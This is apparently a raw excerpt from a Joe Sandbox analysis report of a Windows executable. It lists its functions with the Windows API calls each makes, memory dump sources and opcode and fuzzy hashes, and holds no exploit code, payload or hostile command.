                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3763101759-0
                                                                                                                                                                                                                                  • Opcode ID: 266ec9d11defb942bbbcceabd733cb81e5973c35da988a1fd7a5bbabcaccfc1f
                                                                                                                                                                                                                                  • Instruction ID: 3953776af25e49897cfc8649848bc220b1e2bb507196196cea9f8240c105554e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 266ec9d11defb942bbbcceabd733cb81e5973c35da988a1fd7a5bbabcaccfc1f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4921E575900218AFCB11AFA8C982BFEBBF8EF95760F104064E904BB251D6709E41CBB1
                                                                                                                                                                                                                                  Function 00A29A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00A29A5D
                                                                                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A29A72
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00A29ABA
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00A29AF0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2864067406-0
                                                                                                                                                                                                                                  • Opcode ID: dc9d6167a581ba59b17f71355a09dd58f2fabb35590393a413a4e33436319c1e
                                                                                                                                                                                                                                  • Instruction ID: 2b0a367b2902d83cb5001677b09b8a90749b622b8902a26cfa0f987b38fba937
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc9d6167a581ba59b17f71355a09dd58f2fabb35590393a413a4e33436319c1e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB21EC31600228AFCF25CF98D848EFF3BB9EB49B90F404065F9098B1A1C3709952DB60
                                                                                                                                                                                                                                  Function 009FDB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00A2DC30), ref: 009FDBA6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009FDBB5
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 009FDBC4
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A2DC30), ref: 009FDC21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2267087916-0
                                                                                                                                                                                                                                  • Opcode ID: 284c355824d3968ada875caab37d76c194d6c32ca339b74f7fe2cb89dd5d8b8e
                                                                                                                                                                                                                                  • Instruction ID: 3458254723601c0e4e7e4329e5b4d197ed9f0d96178e808d32d54dfd4d1ba1ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 284c355824d3968ada875caab37d76c194d6c32ca339b74f7fe2cb89dd5d8b8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F421E5705093099F8710DF28C9809BBB7E8FE96364F200A1DF5D8C32A2D730D946CB82
                                                                                                                                                                                                                                  Function 00A2321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00A232A6
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A232C0
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A232CE
                                                                                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A232DC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                                                                                                                  • Opcode ID: 9bf67cbcbeef5f997e2d0d4b58d19c7a7fde61dc1553b1b8177e82ba5f8b62b0
                                                                                                                                                                                                                                  • Instruction ID: 1076b994a391fdc7f631765bf0d1949e389c8caf5cd10d080ee5d18c036391e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bf67cbcbeef5f997e2d0d4b58d19c7a7fde61dc1553b1b8177e82ba5f8b62b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8621C732204121AFDB14DB18DC45FAA7B65AF96314F248268F8268B2D2C779ED42C7D0
                                                                                                                                                                                                                                  Function 00A0D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00A0D8CE
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00A0D92F
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 00A0D943
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 234945975-0
                                                                                                                                                                                                                                  • Opcode ID: 335498d1bc4454643a5915ff8ca26c0b22fc479d717e08440f8e0ff500be89c6
                                                                                                                                                                                                                                  • Instruction ID: 7611ee9e5d9bbdeccf90e401f66083de65787e130d2f16f4a1ebbeb90852ec9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 335498d1bc4454643a5915ff8ca26c0b22fc479d717e08440f8e0ff500be89c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F219072900709EFE730DFE5E944BAAB7FCAB40354F10442DE64692592E770EA0A8B90
                                                                                                                                                                                                                                  Function 009F825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009F8271,?,000000FF,?,009F90BB,00000000,?,0000001C,?,?), ref: 009F96F3
                                                                                                                                                                                                                                    • Part of subcall function 009F96E4: lstrcpyW.KERNEL32(00000000,?), ref: 009F9719
                                                                                                                                                                                                                                    • Part of subcall function 009F96E4: lstrcmpiW.KERNEL32(00000000,?,009F8271,?,000000FF,?,009F90BB,00000000,?,0000001C,?,?), ref: 009F974A
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009F90BB,00000000,?,0000001C,?,?,00000000), ref: 009F828A
                                                                                                                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 009F82B0
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,009F90BB,00000000,?,0000001C,?,?,00000000), ref: 009F82EB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                  • String ID: cdecl
                                                                                                                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                  • Opcode ID: 06c1d6c68ae5832e3f14f7d0a4e50b976d67e401c97b9d211a2ffe17edad05a4
                                                                                                                                                                                                                                  • Instruction ID: cb4e9e80093ccfdf798dae250a4f9239200bf3588a6558b38e006d453556b033
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c1d6c68ae5832e3f14f7d0a4e50b976d67e401c97b9d211a2ffe17edad05a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15110B3A200346ABCB149F78D845EBF77E9FF85750B50412AFA46C7260EF719812C750
                                                                                                                                                                                                                                  Function 00A260FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A2615A
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2616C
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A26177
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A262B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 455545452-0
                                                                                                                                                                                                                                  • Opcode ID: 0ac552a6bd0feea1c13323079b62248b4cf4c806a4340f8d05cfb1666bc3bafe
                                                                                                                                                                                                                                  • Instruction ID: 4c0364b34fda39cdd0fe939b57ee6c33c32f3c7f1f946346e00666b38ff38f3e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ac552a6bd0feea1c13323079b62248b4cf4c806a4340f8d05cfb1666bc3bafe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6711D335901228A6DB20DFA8ED84AEF7BBCFF51760B10413AFA11D6082E774D941DB60
                                                                                                                                                                                                                                  Function 009C2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3cc61f4abffe9a76390e7c3c93dd2f489ce8033bf33694d7f74a7d06e007d1d9
                                                                                                                                                                                                                                  • Instruction ID: d822bf2322a0af6f2e25d1cb0a8a887368c2b1a7af786892057461212a3e8cd5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cc61f4abffe9a76390e7c3c93dd2f489ce8033bf33694d7f74a7d06e007d1d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A2B2A092167EF621A7BC6CC0F27671DDF913B8B34072EF521A51D2DA608C81D162
                                                                                                                                                                                                                                  Function 009F2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 009F2394
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009F23A6
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009F23BC
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009F23D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 5f76d6498804f2d9a178b66c6859488ae866cf233e8af3db667b99bfbb68e9fe
                                                                                                                                                                                                                                  • Instruction ID: ae14019570e6fc37f9fa451d3f3e3cd4326313e6a9efd4e30a9925a69551c54a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f76d6498804f2d9a178b66c6859488ae866cf233e8af3db667b99bfbb68e9fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9110C76900218FFDB11DB95CD85FADBB78FB08750F200091EA01B7290D6756E15DB94
                                                                                                                                                                                                                                  Function 00991AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00991AF4
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 009D31F9
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 009D3203
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009D320E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4127811313-0
                                                                                                                                                                                                                                  • Opcode ID: 03a0cbaba9ce09bbcee82f89eee55ed9eab4aa0d6b29946adca97420004b0a66
                                                                                                                                                                                                                                  • Instruction ID: fe870dcb8e456099c2f86167e9792f7b99327997554ff7c379f93a07b4d57c04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03a0cbaba9ce09bbcee82f89eee55ed9eab4aa0d6b29946adca97420004b0a66
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E113A32A0201AABDF10DFA8C9459FE77B9FB45341F104462F902E3241C774BA92CBA5
                                                                                                                                                                                                                                  Function 009FEAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009FEB14
                                                                                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 009FEB47
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009FEB5D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009FEB64
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2880819207-0
                                                                                                                                                                                                                                  • Opcode ID: 943c9cd2733c3949da2f053acadab027618d92db11e80c58940c71251353d17d
                                                                                                                                                                                                                                  • Instruction ID: dde0abab3e63ca61f9468e2d527b5cd7eebd05f25fcb928f2a1a260a724fd2be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 943c9cd2733c3949da2f053acadab027618d92db11e80c58940c71251353d17d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1110872900218BFC711DBEC9C05AAA7FADAB45321F144266F925E73A1D7B4890687A0
                                                                                                                                                                                                                                  Function 009BD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,?,009BD369,00000000,00000004,00000000), ref: 009BD588
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009BD594
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 009BD59B
                                                                                                                                                                                                                                  • ResumeThread.KERNEL32(00000000), ref: 009BD5B9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 173952441-0
                                                                                                                                                                                                                                  • Opcode ID: 791cc46b7b731f4739b7a126c302042c6e2abc8f6af446215d2209ffa4cfba30
                                                                                                                                                                                                                                  • Instruction ID: f0ed3020e1c0e5ab54f6acfa97a866c74835d0a9b72fdc0b62f5981d62145969
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 791cc46b7b731f4739b7a126c302042c6e2abc8f6af446215d2209ffa4cfba30
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1901BE72406118BBD7316FA5DD05FEE7B5DEF81735F100229F925861E0EBB05941C7A1
                                                                                                                                                                                                                                  Function 00997873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009978B1
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 009978C5
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 009978CF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3970641297-0
